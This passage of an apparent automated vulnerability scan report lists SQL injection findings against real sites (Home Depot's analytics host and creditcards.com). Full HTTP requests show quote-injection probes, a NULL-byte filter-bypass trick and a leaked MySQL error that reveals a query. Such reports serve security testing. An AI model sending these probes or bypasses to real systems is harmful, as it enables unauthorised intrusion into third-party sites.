The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html

1.54. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16457054631772 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s16457054631772

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16457054631772?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A39%3A5%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:20 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html

1.55. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s19969816370798 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s19969816370798

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s19969816370798?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A48%3A54%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:05:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html

1.56. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s23837734712508 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s23837734712508

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s23837734712508?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A8%3A3%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:14:01 GMT
Server: Omniture DC/2.0.0
xserver: www287
Content-Length: 0
Content-Type: text/html

1.57. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s24903706079207 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s24903706079207

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s24903706079207 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s24903706079207%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A1%3A1%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:46:55 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html

1.58. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s26866058967834 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s26866058967834

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s26866058967834 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s26866058967834%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A3%3A34%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:54:25 GMT
Server: Omniture DC/2.0.0
xserver: www434
Content-Length: 0
Content-Type: text/html

1.59. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s28965976873370 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s28965976873370

Issue detail

Remediation detail

Request 1

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00'?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s28965976873370 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s28965976873370%00''?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A7%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 13:13:36 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html

1.60. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s29808383558389 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://wasc.homedepot.com
Path:	/b/ss/homedepot/1/H.22.1/s29808383558389

Issue detail

Request 1

GET /b'/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s29808383558389 was not fou
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s29808383558389?AQB=1&ndh=1&t=16%2F5%2F2011%207%3A0%3A27%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:42:01 GMT
Server: Omniture DC/2.0.0
xserver: www372
Content-Length: 0
Content-Type: text/html

1.61. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?pid=22145581'&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:37 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3613
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:37 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22145581''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '22145581''; File: /usr/local/apach
...[SNIP]...

Request 2

GET /oc/?pid=22145581''&pg=1477&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307197294%27%5D%5D; s_sq=%5B%5BB%5D%5D; CCsCookieimp=1308307195

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:40:38 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=10111061705392471c2d1c2616bbabf5&ref=&oid=1012011061705403888336438&data3=0&sid=1889&c=22145581%27%27
Vary: Accept-Encoding
Content-Length: 2765
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:38 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.62. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

